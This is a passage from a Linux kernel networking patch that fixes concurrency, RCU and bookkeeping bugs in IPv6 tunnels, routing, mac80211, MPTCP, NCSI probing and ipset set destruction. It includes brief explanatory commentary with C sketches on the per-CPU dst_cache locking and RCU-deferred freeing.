++		if (oldstate == TCP_ESTABLISHED || oldstate == TCP_CLOSE_WAIT)
+ 			TCP_DEC_STATS(sock_net(sk), TCP_MIB_CURRESTAB);
+ 	}
+ 
+diff --git a/net/ipv6/ioam6_iptunnel.c b/net/ipv6/ioam6_iptunnel.c
+index f6f5b83dd954d..a5cfc5b0b206b 100644
+--- a/net/ipv6/ioam6_iptunnel.c
++++ b/net/ipv6/ioam6_iptunnel.c
+@@ -351,9 +351,9 @@ static int ioam6_output(struct net *net, struct sock *sk, struct sk_buff *skb)
+ 		goto drop;
+ 
+ 	if (!ipv6_addr_equal(&orig_daddr, &ipv6_hdr(skb)->daddr)) {
+-		preempt_disable();
++		local_bh_disable();
+ 		dst = dst_cache_get(&ilwt->cache);
+-		preempt_enable();
++		local_bh_enable();
+ 
+ 		if (unlikely(!dst)) {
+ 			struct ipv6hdr *hdr = ipv6_hdr(skb);
+@@ -373,9 +373,9 @@ static int ioam6_output(struct net *net, struct sock *sk, struct sk_buff *skb)
+ 				goto drop;
+ 			}
+ 
+-			preempt_disable();
++			local_bh_disable();
+ 			dst_cache_set_ip6(&ilwt->cache, dst, &fl6.saddr);
+-			preempt_enable();
++			local_bh_enable();
+ 		}
+ 
+ 		skb_dst_drop(skb);
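
dst_cache is per-CPU data, and these tunnel paths can also run in softirq context, so pinning the CPU with preempt_disable() is not enough; local_bh_disable() both pins the CPU and keeps a softirq from updating the same per-CPU slot mid-operation. The corrected pattern, sketched with illustrative names (lwt, lookup_route, saddr):

    struct dst_entry *dst;

    local_bh_disable();             /* pin the CPU and exclude softirqs */
    dst = dst_cache_get(&lwt->cache);
    if (!dst) {
        dst = lookup_route(skb);    /* hypothetical; e.g. a fib lookup */
        dst_cache_set_ip6(&lwt->cache, dst, &saddr);
    }
    local_bh_enable();
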
+diff --git a/net/ipv6/ip6_fib.c b/net/ipv6/ip6_fib.c
+index 8213626434b91..1123594ad2be7 100644
+--- a/net/ipv6/ip6_fib.c
++++ b/net/ipv6/ip6_fib.c
+@@ -962,6 +962,7 @@ static void __fib6_drop_pcpu_from(struct fib6_nh *fib6_nh,
+ 	if (!fib6_nh->rt6i_pcpu)
+ 		return;
+ 
++	rcu_read_lock();
+ 	/* release the reference to this fib entry from
+ 	 * all of its cached pcpu routes
+ 	 */
+@@ -970,7 +971,9 @@ static void __fib6_drop_pcpu_from(struct fib6_nh *fib6_nh,
+ 		struct rt6_info *pcpu_rt;
+ 
+ 		ppcpu_rt = per_cpu_ptr(fib6_nh->rt6i_pcpu, cpu);
+-		pcpu_rt = *ppcpu_rt;
++
++		/* Paired with xchg() in rt6_get_pcpu_route() */
++		pcpu_rt = READ_ONCE(*ppcpu_rt);
+ 
+ 		/* only dropping the 'from' reference if the cached route
+ 		 * is using 'match'. The cached pcpu_rt->from only changes
+@@ -984,6 +987,7 @@ static void __fib6_drop_pcpu_from(struct fib6_nh *fib6_nh,
+ 			fib6_info_release(from);
+ 		}
+ 	}
++	rcu_read_unlock();
+ }
+ 
+ struct fib6_nh_pcpu_arg {
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index 258e87055836f..d305051e8ab5f 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -1401,6 +1401,7 @@ static struct rt6_info *rt6_get_pcpu_route(const struct fib6_result *res)
+ 		struct rt6_info *prev, **p;
+ 
+ 		p = this_cpu_ptr(res->nh->rt6i_pcpu);
++		/* Paired with READ_ONCE() in __fib6_drop_pcpu_from() */
+ 		prev = xchg(p, NULL);
+ 		if (prev) {
+ 			dst_dev_put(&prev->dst);
+@@ -6334,12 +6335,12 @@ static int ipv6_sysctl_rtcache_flush(struct ctl_table *ctl, int write,
+ 	if (!write)
+ 		return -EINVAL;
+ 
+-	net = (struct net *)ctl->extra1;
+-	delay = net->ipv6.sysctl.flush_delay;
+ 	ret = proc_dointvec(ctl, write, buffer, lenp, ppos);
+ 	if (ret)
+ 		return ret;
+ 
++	net = (struct net *)ctl->extra1;
++	delay = net->ipv6.sysctl.flush_delay;
+ 	fib6_run_gc(delay <= 0 ? 0 : (unsigned long)delay, net, delay > 0);
+ 	return 0;
+ }
+diff --git a/net/ipv6/seg6_iptunnel.c b/net/ipv6/seg6_iptunnel.c
+index 5924407b87b07..ae5299c277bcf 100644
+--- a/net/ipv6/seg6_iptunnel.c
++++ b/net/ipv6/seg6_iptunnel.c
+@@ -464,9 +464,8 @@ static int seg6_input_core(struct net *net, struct sock *sk,
+ 
+ 	slwt = seg6_lwt_lwtunnel(orig_dst->lwtstate);
+ 
+-	preempt_disable();
++	local_bh_disable();
+ 	dst = dst_cache_get(&slwt->cache);
+-	preempt_enable();
+ 
+ 	skb_dst_drop(skb);
+ 
+@@ -474,14 +473,13 @@ static int seg6_input_core(struct net *net, struct sock *sk,
+ 		ip6_route_input(skb);
+ 		dst = skb_dst(skb);
+ 		if (!dst->error) {
+-			preempt_disable();
+ 			dst_cache_set_ip6(&slwt->cache, dst,
+ 					  &ipv6_hdr(skb)->saddr);
+-			preempt_enable();
+ 		}
+ 	} else {
+ 		skb_dst_set(skb, dst);
+ 	}
++	local_bh_enable();
+ 
+ 	err = skb_cow_head(skb, LL_RESERVED_SPACE(dst->dev));
+ 	if (unlikely(err))
+@@ -537,9 +535,9 @@ static int seg6_output_core(struct net *net, struct sock *sk,
+ 
+ 	slwt = seg6_lwt_lwtunnel(orig_dst->lwtstate);
+ 
+-	preempt_disable();
++	local_bh_disable();
+ 	dst = dst_cache_get(&slwt->cache);
+-	preempt_enable();
++	local_bh_enable();
+ 
+ 	if (unlikely(!dst)) {
+ 		struct ipv6hdr *hdr = ipv6_hdr(skb);
+@@ -559,9 +557,9 @@ static int seg6_output_core(struct net *net, struct sock *sk,
+ 			goto drop;
+ 		}
+ 
+-		preempt_disable();
++		local_bh_disable();
+ 		dst_cache_set_ip6(&slwt->cache, dst, &fl6.saddr);
+-		preempt_enable();
++		local_bh_enable();
+ 	}
+ 
+ 	skb_dst_drop(skb);
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index ba9a22db5805c..4b0e05349862d 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -1291,7 +1291,6 @@ static struct sock *tcp_v6_syn_recv_sock(const struct sock *sk, struct sk_buff *
+ 	 */
+ 
+ 	newsk->sk_gso_type = SKB_GSO_TCPV6;
+-	ip6_dst_store(newsk, dst, NULL, NULL);
+ 	inet6_sk_rx_dst_set(newsk, skb);
+ 
+ 	inet_sk(newsk)->pinet6 = tcp_inet6_sk(newsk);
+@@ -1302,6 +1301,8 @@ static struct sock *tcp_v6_syn_recv_sock(const struct sock *sk, struct sk_buff *
+ 
+ 	memcpy(newnp, np, sizeof(struct ipv6_pinfo));
+ 
++	ip6_dst_store(newsk, dst, NULL, NULL);
++
+ 	newsk->sk_v6_daddr = ireq->ir_v6_rmt_addr;
+ 	newnp->saddr = ireq->ir_v6_loc_addr;
+ 	newsk->sk_v6_rcv_saddr = ireq->ir_v6_loc_addr;
+diff --git a/net/mac80211/he.c b/net/mac80211/he.c
+index 0322abae08250..147ff0f71b9bb 100644
+--- a/net/mac80211/he.c
++++ b/net/mac80211/he.c
+@@ -231,15 +231,21 @@ ieee80211_he_spr_ie_to_bss_conf(struct ieee80211_vif *vif,
+ 
+ 	if (!he_spr_ie_elem)
+ 		return;
++
++	he_obss_pd->sr_ctrl = he_spr_ie_elem->he_sr_control;
+ 	data = he_spr_ie_elem->optional;
+ 
+ 	if (he_spr_ie_elem->he_sr_control &
+ 	    IEEE80211_HE_SPR_NON_SRG_OFFSET_PRESENT)
+-		data++;
++		he_obss_pd->non_srg_max_offset = *data++;
++
+ 	if (he_spr_ie_elem->he_sr_control &
+ 	    IEEE80211_HE_SPR_SRG_INFORMATION_PRESENT) {
+-		he_obss_pd->max_offset = *data++;
+ 		he_obss_pd->min_offset = *data++;
++		he_obss_pd->max_offset = *data++;
++		memcpy(he_obss_pd->bss_color_bitmap, data, 8);
++		data += 8;
++		memcpy(he_obss_pd->partial_bssid_bitmap, data, 8);
+ 		he_obss_pd->enable = true;
+ 	}
+ }
+diff --git a/net/mac80211/mesh_pathtbl.c b/net/mac80211/mesh_pathtbl.c
+index 69d5e1ec6edef..e7b9dcf30adc9 100644
+--- a/net/mac80211/mesh_pathtbl.c
++++ b/net/mac80211/mesh_pathtbl.c
+@@ -723,10 +723,23 @@ void mesh_path_discard_frame(struct ieee80211_sub_if_data *sdata,
+  */
+ void mesh_path_flush_pending(struct mesh_path *mpath)
+ {
++	struct ieee80211_sub_if_data *sdata = mpath->sdata;
++	struct ieee80211_if_mesh *ifmsh = &sdata->u.mesh;
++	struct mesh_preq_queue *preq, *tmp;
+ 	struct sk_buff *skb;
+ 
+ 	while ((skb = skb_dequeue(&mpath->frame_queue)) != NULL)
+ 		mesh_path_discard_frame(mpath->sdata, skb);
++
++	spin_lock_bh(&ifmsh->mesh_preq_queue_lock);
++	list_for_each_entry_safe(preq, tmp, &ifmsh->preq_queue.list, list) {
++		if (ether_addr_equal(mpath->dst, preq->dst)) {
++			list_del(&preq->list);
++			kfree(preq);
++			--ifmsh->preq_queue_len;
++		}
++	}
++	spin_unlock_bh(&ifmsh->mesh_preq_queue_lock);
+ }
+ 
+ /**
+diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
+index bd56015b29258..f388b39531748 100644
+--- a/net/mac80211/sta_info.c
++++ b/net/mac80211/sta_info.c
+@@ -1555,7 +1555,7 @@ void ieee80211_sta_ps_deliver_wakeup(struct sta_info *sta)
+ 	skb_queue_head_init(&pending);
+ 
+ 	/* sync with ieee80211_tx_h_unicast_ps_buf */
+-	spin_lock(&sta->ps_lock);
++	spin_lock_bh(&sta->ps_lock);
+ 	/* Send all buffered frames to the station */
+ 	for (ac = 0; ac < IEEE80211_NUM_ACS; ac++) {
+ 		int count = skb_queue_len(&pending), tmp;
+@@ -1584,7 +1584,7 @@ void ieee80211_sta_ps_deliver_wakeup(struct sta_info *sta)
+ 	 */
+ 	clear_sta_flag(sta, WLAN_STA_PSPOLL);
+ 	clear_sta_flag(sta, WLAN_STA_UAPSD);
+-	spin_unlock(&sta->ps_lock);
++	spin_unlock_bh(&sta->ps_lock);
+ 
+ 	atomic_dec(&ps->num_sta_ps);
+ 
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 3328870b0c1f8..3e2cbf0e6ce99 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -685,6 +685,7 @@ static void mptcp_pm_nl_add_addr_received(struct mptcp_sock *msk)
+ 	unsigned int add_addr_accept_max;
+ 	struct mptcp_addr_info remote;
+ 	unsigned int subflows_max;
++	bool sf_created = false;
+ 	int i, nr;
+ 
+ 	add_addr_accept_max = mptcp_pm_get_add_addr_accept_max(msk);
+@@ -710,15 +711,18 @@ static void mptcp_pm_nl_add_addr_received(struct mptcp_sock *msk)
+ 	 */
+ 	nr = fill_local_addresses_vec(msk, addrs);
+ 
+-	msk->pm.add_addr_accepted++;
+-	if (msk->pm.add_addr_accepted >= add_addr_accept_max ||
+-	    msk->pm.subflows >= subflows_max)
+-		WRITE_ONCE(msk->pm.accept_addr, false);
+-
+ 	spin_unlock_bh(&msk->pm.lock);
+ 	for (i = 0; i < nr; i++)
+-		__mptcp_subflow_connect(sk, &addrs[i], &remote);
++		if (__mptcp_subflow_connect(sk, &addrs[i], &remote) == 0)
++			sf_created = true;
+ 	spin_lock_bh(&msk->pm.lock);
++
++	if (sf_created) {
++		msk->pm.add_addr_accepted++;
++		if (msk->pm.add_addr_accepted >= add_addr_accept_max ||
++		    msk->pm.subflows >= subflows_max)
++			WRITE_ONCE(msk->pm.accept_addr, false);
++	}
+ }
+ 
+ void mptcp_pm_nl_addr_send_ack(struct mptcp_sock *msk)
+@@ -820,10 +824,13 @@ static void mptcp_pm_nl_rm_addr_or_subflow(struct mptcp_sock *msk,
+ 			spin_lock_bh(&msk->pm.lock);
+ 
+ 			removed = true;
+-			__MPTCP_INC_STATS(sock_net(sk), rm_type);
++			if (rm_type == MPTCP_MIB_RMSUBFLOW)
++				__MPTCP_INC_STATS(sock_net(sk), rm_type);
+ 		}
+ 		if (rm_type == MPTCP_MIB_RMSUBFLOW)
+ 			__set_bit(rm_id ? rm_id : msk->mpc_endpoint_id, msk->pm.id_avail_bitmap);
++		else if (rm_type == MPTCP_MIB_RMADDR)
++			__MPTCP_INC_STATS(sock_net(sk), rm_type);
+ 		if (!removed)
+ 			continue;
+ 
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index b6815610a6fa1..d6f3e1b9e8442 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -3757,6 +3757,7 @@ static int mptcp_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+ 
+ 	WRITE_ONCE(msk->write_seq, subflow->idsn);
+ 	WRITE_ONCE(msk->snd_nxt, subflow->idsn);
++	WRITE_ONCE(msk->snd_una, subflow->idsn);
+ 	if (likely(!__mptcp_check_fallback(msk)))
+ 		MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_MPCAPABLEACTIVE);
+ 
+diff --git a/net/ncsi/internal.h b/net/ncsi/internal.h
+index 374412ed780b6..ef0f8f73826f5 100644
+--- a/net/ncsi/internal.h
++++ b/net/ncsi/internal.h
+@@ -325,6 +325,7 @@ struct ncsi_dev_priv {
+ 	spinlock_t          lock;            /* Protect the NCSI device    */
+ 	unsigned int        package_probe_id;/* Current ID during probe    */
+ 	unsigned int        package_num;     /* Number of packages         */
++	unsigned int        channel_probe_id;/* Current channel ID during probe */
+ 	struct list_head    packages;        /* List of packages           */
+ 	struct ncsi_channel *hot_channel;    /* Channel was ever active    */
+ 	struct ncsi_request requests[256];   /* Request table              */
+@@ -343,6 +344,7 @@ struct ncsi_dev_priv {
+ 	bool                multi_package;   /* Enable multiple packages   */
+ 	bool                mlx_multi_host;  /* Enable multi host Mellanox */
+ 	u32                 package_whitelist; /* Packages to configure    */
++	unsigned char       channel_count;     /* Num of channels to probe   */
+ };
+ 
+ struct ncsi_cmd_arg {
+diff --git a/net/ncsi/ncsi-manage.c b/net/ncsi/ncsi-manage.c
+index 80713febfac6d..760b33fa03a8b 100644
+--- a/net/ncsi/ncsi-manage.c
++++ b/net/ncsi/ncsi-manage.c
+@@ -510,17 +510,19 @@ static void ncsi_suspend_channel(struct ncsi_dev_priv *ndp)
+ 
+ 		break;
+ 	case ncsi_dev_state_suspend_gls:
+-		ndp->pending_req_num = np->channel_num;
++		ndp->pending_req_num = 1;
+ 
+ 		nca.type = NCSI_PKT_CMD_GLS;
+ 		nca.package = np->id;
++		nca.channel = ndp->channel_probe_id;
++		ret = ncsi_xmit_cmd(&nca);
++		if (ret)
++			goto error;
++		ndp->channel_probe_id++;
+ 
+-		nd->state = ncsi_dev_state_suspend_dcnt;
+-		NCSI_FOR_EACH_CHANNEL(np, nc) {
+-			nca.channel = nc->id;
+-			ret = ncsi_xmit_cmd(&nca);
+-			if (ret)
+-				goto error;
++		if (ndp->channel_probe_id == ndp->channel_count) {
++			ndp->channel_probe_id = 0;
++			nd->state = ncsi_dev_state_suspend_dcnt;
+ 		}
+ 
+ 		break;
+@@ -689,8 +691,6 @@ static int set_one_vid(struct ncsi_dev_priv *ndp, struct ncsi_channel *nc,
+ 	return 0;
+ }
+ 
+-#if IS_ENABLED(CONFIG_NCSI_OEM_CMD_KEEP_PHY)
+-
+ static int ncsi_oem_keep_phy_intel(struct ncsi_cmd_arg *nca)
+ {
+ 	unsigned char data[NCSI_OEM_INTEL_CMD_KEEP_PHY_LEN];
+@@ -716,10 +716,6 @@ static int ncsi_oem_keep_phy_intel(struct ncsi_cmd_arg *nca)
+ 	return ret;
+ }
+ 
+-#endif
+-
+-#if IS_ENABLED(CONFIG_NCSI_OEM_CMD_GET_MAC)
+-
+ /* NCSI OEM Command APIs */
+ static int ncsi_oem_gma_handler_bcm(struct ncsi_cmd_arg *nca)
+ {
+@@ -856,8 +852,6 @@ static int ncsi_gma_handler(struct ncsi_cmd_arg *nca, unsigned int mf_id)
+ 	return nch->handler(nca);
+ }
+ 
+-#endif /* CONFIG_NCSI_OEM_CMD_GET_MAC */
+-
+ /* Determine if a given channel from the channel_queue should be used for Tx */
+ static bool ncsi_channel_is_tx(struct ncsi_dev_priv *ndp,
+ 			       struct ncsi_channel *nc)
+@@ -1039,20 +1033,18 @@ static void ncsi_configure_channel(struct ncsi_dev_priv *ndp)
+ 			goto error;
+ 		}
+ 
+-		nd->state = ncsi_dev_state_config_oem_gma;
++		nd->state = IS_ENABLED(CONFIG_NCSI_OEM_CMD_GET_MAC)
++			  ? ncsi_dev_state_config_oem_gma
++			  : ncsi_dev_state_config_clear_vids;
+ 		break;
+ 	case ncsi_dev_state_config_oem_gma:
+ 		nd->state = ncsi_dev_state_config_clear_vids;
+-		ret = -1;
+ 
+-#if IS_ENABLED(CONFIG_NCSI_OEM_CMD_GET_MAC)
+ 		nca.type = NCSI_PKT_CMD_OEM;
+ 		nca.package = np->id;
+ 		nca.channel = nc->id;
+ 		ndp->pending_req_num = 1;
+ 		ret = ncsi_gma_handler(&nca, nc->version.mf_id);
+-#endif /* CONFIG_NCSI_OEM_CMD_GET_MAC */
+-
+ 		if (ret < 0)
+ 			schedule_work(&ndp->work);
+ 
+@@ -1350,7 +1342,6 @@ static void ncsi_probe_channel(struct ncsi_dev_priv *ndp)
+ {
+ 	struct ncsi_dev *nd = &ndp->ndev;
+ 	struct ncsi_package *np;
+-	struct ncsi_channel *nc;
+ 	struct ncsi_cmd_arg nca;
+ 	unsigned char index;
+ 	int ret;
+@@ -1404,7 +1395,6 @@ static void ncsi_probe_channel(struct ncsi_dev_priv *ndp)
+ 
+ 		schedule_work(&ndp->work);
+ 		break;
+-#if IS_ENABLED(CONFIG_NCSI_OEM_CMD_GET_MAC)
+ 	case ncsi_dev_state_probe_mlx_gma:
+ 		ndp->pending_req_num = 1;
+ 
+@@ -1429,25 +1419,6 @@ static void ncsi_probe_channel(struct ncsi_dev_priv *ndp)
+ 
+ 		nd->state = ncsi_dev_state_probe_cis;
+ 		break;
+-#endif /* CONFIG_NCSI_OEM_CMD_GET_MAC */
+-	case ncsi_dev_state_probe_cis:
+-		ndp->pending_req_num = NCSI_RESERVED_CHANNEL;
+-
+-		/* Clear initial state */
+-		nca.type = NCSI_PKT_CMD_CIS;
+-		nca.package = ndp->active_package->id;
+-		for (index = 0; index < NCSI_RESERVED_CHANNEL; index++) {
+-			nca.channel = index;
+-			ret = ncsi_xmit_cmd(&nca);
+-			if (ret)
+-				goto error;
+-		}
+-
+-		nd->state = ncsi_dev_state_probe_gvi;
+-		if (IS_ENABLED(CONFIG_NCSI_OEM_CMD_KEEP_PHY))
+-			nd->state = ncsi_dev_state_probe_keep_phy;
+-		break;
+-#if IS_ENABLED(CONFIG_NCSI_OEM_CMD_KEEP_PHY)
+ 	case ncsi_dev_state_probe_keep_phy:
+ 		ndp->pending_req_num = 1;
+ 
+@@ -1460,15 +1431,17 @@ static void ncsi_probe_channel(struct ncsi_dev_priv *ndp)
+ 
+ 		nd->state = ncsi_dev_state_probe_gvi;
+ 		break;
+-#endif /* CONFIG_NCSI_OEM_CMD_KEEP_PHY */
++	case ncsi_dev_state_probe_cis:
+ 	case ncsi_dev_state_probe_gvi:
+ 	case ncsi_dev_state_probe_gc:
+ 	case ncsi_dev_state_probe_gls:
+ 		np = ndp->active_package;
+-		ndp->pending_req_num = np->channel_num;
++		ndp->pending_req_num = 1;
+ 
+-		/* Retrieve version, capability or link status */
+-		if (nd->state == ncsi_dev_state_probe_gvi)
++		/* Clear initial state; retrieve version, capability or link status */
++		if (nd->state == ncsi_dev_state_probe_cis)
++			nca.type = NCSI_PKT_CMD_CIS;
++		else if (nd->state == ncsi_dev_state_probe_gvi)
+ 			nca.type = NCSI_PKT_CMD_GVI;
+ 		else if (nd->state == ncsi_dev_state_probe_gc)
+ 			nca.type = NCSI_PKT_CMD_GC;
+@@ -1476,19 +1449,29 @@ static void ncsi_probe_channel(struct ncsi_dev_priv *ndp)
+ 			nca.type = NCSI_PKT_CMD_GLS;
+ 
+ 		nca.package = np->id;
+-		NCSI_FOR_EACH_CHANNEL(np, nc) {
+-			nca.channel = nc->id;
+-			ret = ncsi_xmit_cmd(&nca);
+-			if (ret)
+-				goto error;
+-		}
++		nca.channel = ndp->channel_probe_id;
++
++		ret = ncsi_xmit_cmd(&nca);
++		if (ret)
++			goto error;
+ 
+-		if (nd->state == ncsi_dev_state_probe_gvi)
++		if (nd->state == ncsi_dev_state_probe_cis) {
++			nd->state = ncsi_dev_state_probe_gvi;
++			if (IS_ENABLED(CONFIG_NCSI_OEM_CMD_KEEP_PHY) && ndp->channel_probe_id == 0)
++				nd->state = ncsi_dev_state_probe_keep_phy;
++		} else if (nd->state == ncsi_dev_state_probe_gvi) {
+ 			nd->state = ncsi_dev_state_probe_gc;
+-		else if (nd->state == ncsi_dev_state_probe_gc)
++		} else if (nd->state == ncsi_dev_state_probe_gc) {
+ 			nd->state = ncsi_dev_state_probe_gls;
+-		else
++		} else {
++			nd->state = ncsi_dev_state_probe_cis;
++			ndp->channel_probe_id++;
++		}
++
++		if (ndp->channel_probe_id == ndp->channel_count) {
++			ndp->channel_probe_id = 0;
+ 			nd->state = ncsi_dev_state_probe_dp;
++		}
+ 		break;
+ 	case ncsi_dev_state_probe_dp:
+ 		ndp->pending_req_num = 1;
+@@ -1789,6 +1772,7 @@ struct ncsi_dev *ncsi_register_dev(struct net_device *dev,
+ 		ndp->requests[i].ndp = ndp;
+ 		timer_setup(&ndp->requests[i].timer, ncsi_request_timeout, 0);
+ 	}
++	ndp->channel_count = NCSI_RESERVED_CHANNEL;
+ 
+ 	spin_lock_irqsave(&ncsi_dev_lock, flags);
+ 	list_add_tail_rcu(&ndp->node, &ncsi_dev_list);
+@@ -1822,6 +1806,7 @@ int ncsi_start_dev(struct ncsi_dev *nd)
+ 
+ 	if (!(ndp->flags & NCSI_DEV_PROBED)) {
+ 		ndp->package_probe_id = 0;
++		ndp->channel_probe_id = 0;
+ 		nd->state = ncsi_dev_state_probe;
+ 		schedule_work(&ndp->work);
+ 		return 0;
+diff --git a/net/ncsi/ncsi-rsp.c b/net/ncsi/ncsi-rsp.c
+index 480e80e3c2836..f22d67cb04d37 100644
+--- a/net/ncsi/ncsi-rsp.c
++++ b/net/ncsi/ncsi-rsp.c
+@@ -795,12 +795,13 @@ static int ncsi_rsp_handler_gc(struct ncsi_request *nr)
+ 	struct ncsi_rsp_gc_pkt *rsp;
+ 	struct ncsi_dev_priv *ndp = nr->ndp;
+ 	struct ncsi_channel *nc;
++	struct ncsi_package *np;
+ 	size_t size;
+ 
+ 	/* Find the channel */
+ 	rsp = (struct ncsi_rsp_gc_pkt *)skb_network_header(nr->rsp);
+ 	ncsi_find_package_and_channel(ndp, rsp->rsp.common.channel,
+-				      NULL, &nc);
++				      &np, &nc);
+ 	if (!nc)
+ 		return -ENODEV;
+ 
+@@ -835,6 +836,7 @@ static int ncsi_rsp_handler_gc(struct ncsi_request *nr)
+ 	 */
+ 	nc->vlan_filter.bitmap = U64_MAX;
+ 	nc->vlan_filter.n_vids = rsp->vlan_cnt;
++	np->ndp->channel_count = rsp->channel_cnt;
+ 
+ 	return 0;
+ }
+diff --git a/net/netfilter/ipset/ip_set_core.c b/net/netfilter/ipset/ip_set_core.c
+index f645da82d826e..649b8a5901e33 100644
+--- a/net/netfilter/ipset/ip_set_core.c
++++ b/net/netfilter/ipset/ip_set_core.c
+@@ -1174,23 +1174,50 @@ ip_set_setname_policy[IPSET_ATTR_CMD_MAX + 1] = {
+ 				    .len = IPSET_MAXNAMELEN - 1 },
+ };
+ 
++/* In order to return quickly when destroying a single set, it is split
++ * into two stages:
++ * - Cancel garbage collector
++ * - Destroy the set itself via call_rcu()
++ */
++
+ static void
+-ip_set_destroy_set(struct ip_set *set)
++ip_set_destroy_set_rcu(struct rcu_head *head)
+ {
+-	pr_debug("set: %s\n",  set->name);
++	struct ip_set *set = container_of(head, struct ip_set, rcu);
+ 
+-	/* Must call it without holding any lock */
+ 	set->variant->destroy(set);
+ 	module_put(set->type->me);
+ 	kfree(set);
+ }
+ 
+ static void
+-ip_set_destroy_set_rcu(struct rcu_head *head)
++_destroy_all_sets(struct ip_set_net *inst)
+ {
+-	struct ip_set *set = container_of(head, struct ip_set, rcu);
++	struct ip_set *set;
++	ip_set_id_t i;
++	bool need_wait = false;
+ 
+-	ip_set_destroy_set(set);
++	/* First cancel gc's: set:list sets are flushed as well */
++	for (i = 0; i < inst->ip_set_max; i++) {
++		set = ip_set(inst, i);
++		if (set) {
++			set->variant->cancel_gc(set);
++			if (set->type->features & IPSET_TYPE_NAME)
++				need_wait = true;
++		}
++	}
++	/* Must wait for flush to be really finished  */
++	if (need_wait)
++		rcu_barrier();
++	for (i = 0; i < inst->ip_set_max; i++) {
++		set = ip_set(inst, i);
++		if (set) {
++			ip_set(inst, i) = NULL;
++			set->variant->destroy(set);
++			module_put(set->type->me);
++			kfree(set);
++		}
++	}
+ }
+ 
+ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+@@ -1204,11 +1231,10 @@ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+ 	if (unlikely(protocol_min_failed(attr)))
+ 		return -IPSET_ERR_PROTOCOL;
+ 
+-
+ 	/* Commands are serialized and references are
+ 	 * protected by the ip_set_ref_lock.
+ 	 * External systems (i.e. xt_set) must call
+-	 * ip_set_put|get_nfnl_* functions, that way we
++	 * ip_set_nfnl_get_* functions, that way we
+ 	 * can safely check references here.
+ 	 *
+ 	 * list:set timer can only decrement the reference
+@@ -1216,8 +1242,6 @@ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+ 	 * without holding the lock.
+ 	 */
+ 	if (!attr[IPSET_ATTR_SETNAME]) {
+-		/* Must wait for flush to be really finished in list:set */
+-		rcu_barrier();
+ 		read_lock_bh(&ip_set_ref_lock);
+ 		for (i = 0; i < inst->ip_set_max; i++) {
+ 			s = ip_set(inst, i);
+@@ -1228,15 +1252,7 @@ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+ 		}
+ 		inst->is_destroyed = true;
+ 		read_unlock_bh(&ip_set_ref_lock);
+-		for (i = 0; i < inst->ip_set_max; i++) {
+-			s = ip_set(inst, i);
+-			if (s) {
+-				ip_set(inst, i) = NULL;
+-				/* Must cancel garbage collectors */
+-				s->variant->cancel_gc(s);
+-				ip_set_destroy_set(s);
+-			}
+-		}
++		_destroy_all_sets(inst);
+ 		/* Modified by ip_set_destroy() only, which is serialized */
+ 		inst->is_destroyed = false;
+ 	} else {
+@@ -1257,12 +1273,12 @@ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+ 		features = s->type->features;
+ 		ip_set(inst, i) = NULL;
+ 		read_unlock_bh(&ip_set_ref_lock);
++		/* Must cancel garbage collectors */
++		s->variant->cancel_gc(s);
+ 		if (features & IPSET_TYPE_NAME) {
+ 			/* Must wait for flush to be really finished  */
+ 			rcu_barrier();
+ 		}
+-		/* Must cancel garbage collectors */
+-		s->variant->cancel_gc(s);
+ 		call_rcu(&s->rcu, ip_set_destroy_set_rcu);
+ 	}
+ 	return 0;
+@@ -2367,30 +2383,25 @@ ip_set_net_init(struct net *net)
+ }
+ 
+ static void __net_exit
+-ip_set_net_exit(struct net *net)
++ip_set_net_pre_exit(struct net *net)
+ {
+ 	struct ip_set_net *inst = ip_set_pernet(net);
+ 
+-	struct ip_set *set = NULL;
+-	ip_set_id_t i;
+-
+ 	inst->is_deleted = true; /* flag for ip_set_nfnl_put */
++}
+ 
+-	nfnl_lock(NFNL_SUBSYS_IPSET);
+-	for (i = 0; i < inst->ip_set_max; i++) {
+-		set = ip_set(inst, i);
+-		if (set) {
+-			ip_set(inst, i) = NULL;
+-			set->variant->cancel_gc(set);
+-			ip_set_destroy_set(set);
+-		}
+-	}
+-	nfnl_unlock(NFNL_SUBSYS_IPSET);
++static void __net_exit
++ip_set_net_exit(struct net *net)
++{
++	struct ip_set_net *inst = ip_set_pernet(net);
++
++	_destroy_all_sets(inst);
+ 	kvfree(rcu_dereference_protected(inst->ip_set_list, 1));
+ }
+ 
+ static struct pernet_operations ip_set_net_ops = {
+ 	.init	= ip_set_net_init,
++	.pre_exit = ip_set_net_pre_exit,
+ 	.exit   = ip_set_net_exit,
+ 	.id	= &ip_set_net_id,
+ 	.size	= sizeof(struct ip_set_net),
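
The reworked destroy path above cancels the garbage collectors synchronously but defers the actual free to call_rcu(), so packet-path readers still walking the set under rcu_read_lock() drain before the memory disappears. The generic shape of that pattern, as a hedged sketch with hypothetical names:

    struct thing {
        struct rcu_head rcu;
        /* ... payload ... */
    };

    static void thing_free_rcu(struct rcu_head *head)
    {
        struct thing *t = container_of(head, struct thing, rcu);

        kfree(t);                   /* runs only after a grace period */
    }

    static void thing_destroy(struct thing *t)
    {
        stop_timers(t);             /* hypothetical: cancel gc first */
        call_rcu(&t->rcu, thing_free_rcu);
    }
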
+diff --git a/net/netfilter/ipset/ip_set_list_set.c b/net/netfilter/ipset/ip_set_list_set.c
+index 6bc7019982b05..e839c356bcb56 100644
+--- a/net/netfilter/ipset/ip_set_list_set.c
++++ b/net/netfilter/ipset/ip_set_list_set.c
+@@ -79,7 +79,7 @@ list_set_kadd(struct ip_set *set, const struct sk_buff *skb,
+ 	struct set_elem *e;
+ 	int ret;
+ 
+-	list_for_each_entry(e, &map->members, list) {
